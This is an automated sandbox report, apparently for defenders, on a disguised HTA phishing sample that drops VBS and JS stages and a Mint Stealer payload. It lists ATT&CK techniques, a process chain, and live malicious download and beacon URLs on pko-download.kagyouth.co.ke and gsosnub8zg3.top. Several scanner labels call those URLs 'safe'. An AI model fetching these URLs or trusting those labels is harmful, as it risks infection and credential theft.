          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information11
          Scripting          		Valid Accounts11
          Windows Management Instrumentation          		11
          Scripting          		111
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote Services1
          Email Collection          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts11
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		1
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Exploitation for Client Execution          		Logon Script (Windows)Logon Script (Windows)111
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials14
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576834 Sample: PKO_0019868519477_PDF_#U246... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 60 pko-download.kagyouth.co.ke 2->60 62 gsosnub8zg3.top 2->62 64 www.google.com 2->64 72 Suricata IDS alerts for network traffic 2->72 74 Yara detected Mint Stealer 2->74 76 Sigma detected: Suspicious MSHTA Child Process 2->76 78 7 other signatures 2->78 11 mshta.exe 15 2->11         started        signatures3 process4 dnsIp5 66 pko-download.kagyouth.co.ke 45.11.180.77, 443, 49730, 49731 M247GB Germany 11->66 56 C:\Users\user\...\676198543e2f1[1].vbs, ASCII 11->56 dropped 15 cmd.exe 3 2 11->15         started        17 cmd.exe 2 11->17         started        19 cmd.exe 1 11->19         started        file6 process7 process8 21 wscript.exe 16 15->21         started        25 conhost.exe 15->25         started        27 wscript.exe 17->27         started        29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        33 curl.exe 2 19->33         started        dnsIp9 52 C:\Users\user\AppData\Local\Temp\riodfc.js, ISO-8859 21->52 dropped 82 Obfuscated command line found 21->82 84 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->84 86 Suspicious execution chain found 21->86 88 Creates processes via WMI 21->88 36 wscript.exe 1 21->36         started        90 System process connects to network (likely due to code injection or exploit) 27->90 39 wscript.exe 27->39         started        58 127.0.0.1 unknown unknown 33->58 54 C:\Users\Public\676198543e2f3.vbs, ASCII 33->54 dropped file10 signatures11 process12 signatures13 80 Windows Scripting host queries suspicious COM object (likely to drop second stage) 36->80 41 conhost.exe 39->41         started        44 conhost.exe 39->44         started        process14 signatures15 92 Obfuscated command line found 41->92 46 powershell.exe 14 15 41->46         started        50 powershell.exe 15 44->50         started        process16 dnsIp17 68 gsosnub8zg3.top 193.149.129.61, 49748, 49749, 80 DANISCODK Denmark 46->68 70 www.google.com 172.217.19.228, 49751, 49752, 80 GOOGLEUS United States 46->70 94 Queries Google from non browser process on port 80 46->94 signatures18

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta0%ReversingLabs

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://pko-download.kagyouth.co.ke/list_files.phpe0%Avira URL Cloudsafe
          http://gsosnub8zg3.top0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/list_files.php0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/P0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/O0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsLMEM0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/js/pmxdhq.txt0#vF~0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/list_files.p0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/list_files.phpitX0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js30%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs(fF$0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbss0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsk0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/jsq.js0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsfv8G20%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/js/riodfc.txtYqH0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbscurl0%Avira URL Cloudsafe
          http://gsosnub8zg3.top/1.php?s=mints210%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbstv0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbss0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs.v0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsdownload.kagyouth.co.ke/6761985430%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/js/pmxdhq.txt0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsgg0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsi0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/js/pmxdhq.txtd0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/$0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/js/riodfc.txt0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/list_files.pM0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs)0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsR0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/:0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbsWinSta00%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs0A0%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs00%Avira URL Cloudsafe
          https://pko-download.kagyouth.co.ke/jsc.js0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          gsosnub8zg3.top
          		193.149.129.61
          		truetrue
            		unknown
            pko-download.kagyouth.co.ke
            		45.11.180.77
            		truetrue
              		unknown
              www.google.com
              		172.217.19.228
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.jstrue
                • Avira URL Cloud: safe
                		unknown
                https://pko-download.kagyouth.co.ke/list_files.phptrue
                • Avira URL Cloud: safe
                		unknown
                http://gsosnub8zg3.top/1.php?s=mints21true
                • Avira URL Cloud: safe
                		unknown
                https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbstrue
                • Avira URL Cloud: safe
                		unknown
                https://pko-download.kagyouth.co.ke/js/pmxdhq.txttrue
                • Avira URL Cloud: safe
                		unknown
                https://pko-download.kagyouth.co.ke/js/riodfc.txttrue
                • Avira URL Cloud: safe
                		unknown
                https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbstrue
                • Avira URL Cloud: safe
                		unknown
                http://www.google.com/false
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schema.org/WebPapowershell.exe, 0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://pko-download.kagyouth.co.ke/wscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914318772.0000000002D57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1911913220.0000000002D56000.00000004.00000020.00020000.00000000.sdmp, 676198543e2f3.vbs.4.drtrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.google.com/preferences?hl=enXpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 0000000F.00000002.1967997619.0000021C0FC6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590044E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://pko-download.kagyouth.co.ke/Pmshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pko-download.kagyouth.co.ke/list_files.pwscript.exe, 0000000A.00000002.1914733283.0000000002F30000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pko-download.kagyouth.co.ke/Omshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1840152370.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841794584.0000000002B6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://pko-download.kagyouth.co.ke/js/pmxdhq.txt0#vF~wscript.exe, 0000000A.00000003.1911549070.0000000005043000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://news.google.com/?tab=wnpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsLMEMmshta.exe, 00000000.00000003.1828083356.0000000006107000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1825820863.00000000060FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1843031818.0000000006108000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://pko-download.kagyouth.co.ke/list_files.phpewscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://gsosnub8zg3.toppowershell.exe, 00000011.00000002.2002991318.000001590180F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/logos/doodles/2024/seasonal-holidays-202powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://docs.google.com/document/?usp=docs_alcpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schema.org/WebPagepowershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.00000159010FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://pko-download.kagyouth.co.ke/list_files.phpitXwscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://0.google.com/powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/webhp?tab=wwpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbssmshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.google.com/logos/doodles/2024/seasonal-holidays-20powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbsfv8G2mshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://contoso.com/powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.google.com/finance?tab=wepowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.google.compowershell.exe, 00000011.00000002.2002991318.0000015901A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs(fF$mshta.exe, 00000000.00000003.1837722113.0000000002BDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1841957476.0000000002BDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://apis.google.compowershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FE35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900615000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://pko-download.kagyouth.co.ke/js/riodfc.txtYqHwscript.exe, 00000007.00000003.1894254003.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895012733.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.1899786645.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1895382763.00000000006C1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.1893884972.00000000006B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.1967997619.0000021C0F821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.blogger.com/?tab=wjpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://pko-download.kagyouth.co.ke/jsq.jswscript.exe, 0000000A.00000003.1909848462.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.1912407424.0000000002DF2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.1914670320.0000000002DF4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://pko-download.kagyouth.co.ke/676198543e20a/js/676198543e135.js3mshta.exe, 00000000.00000003.1838231650.0000000002B6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbscurlcurl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1811615559.0000000003420000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbskcurl.exe, 00000004.00000002.1811679068.00000000034A0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://play.google.com/?hl=en&tab=w8powershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901AC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 0000000F.00000002.1982995994.0000021C1FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C11298000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F896000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1982995994.0000021C1F82F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C0FC9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1967997619.0000021C112CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900462000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910076000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015901A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159101D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590047A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.0000015910011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2046174346.00000159102FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbstvmshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbssmshta.exe, 00000000.00000002.1842663260.0000000005E4D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1839442231.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834157948.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1834220338.0000000005E4B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833194096.0000000005E4B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://go.micropowershell.exe, 0000000F.00000002.1967997619.0000021C10955000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.000001590113A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://drive.google.com/?tab=wopowershell.exe, 0000000F.00000002.1967997619.0000021C10364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2002991318.0000015900B44000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f1.vbs.vmshta.exe, 00000000.00000002.1841957476.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1837722113.0000000002BE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1838091189.0000000002BE6000.00000004.00000020.00020000.00000000.sdmpfalse
